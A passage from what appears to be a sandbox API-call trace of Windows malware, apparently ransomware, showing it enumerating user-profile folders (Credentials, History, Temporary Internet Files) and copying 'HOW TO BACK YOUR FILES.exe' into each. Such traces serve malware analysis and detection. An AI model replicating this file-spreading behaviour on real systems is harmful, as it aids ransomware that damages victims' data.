Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.844] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.844] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.844] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.845] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.845] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.845] GetLastError () returned 0x0 [0078.845] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.845] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.846] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.846] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.846] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.846] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.846] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.847] GetLastError () returned 0x0 [0078.847] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.847] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.847] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.847] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.847] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.847] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.848] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.848] GetLastError () returned 0x0 [0078.848] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.848] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.848] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0078.849] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0078.849] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.849] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.849] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.849] GetLastError () returned 0x0 [0078.850] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.850] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.850] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0078.850] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0078.850] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.850] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.851] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.851] GetLastError () returned 0x0 [0078.851] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.851] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.851] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0078.851] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0078.851] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.851] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.860] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.860] GetLastError () returned 0x0 [0078.860] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.860] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.861] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0078.861] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0078.861] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.861] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.861] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.861] GetLastError () returned 0x0 [0078.862] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.862] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.862] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0078.862] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0078.862] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.862] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.863] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.863] GetLastError () returned 0x0 [0078.863] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.863] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.863] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0078.864] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0078.864] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.864] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.864] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.864] GetLastError () returned 0x0 [0078.865] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.865] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.865] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0078.865] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0078.865] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.865] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.866] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.866] GetLastError () returned 0x0 [0078.866] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.866] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 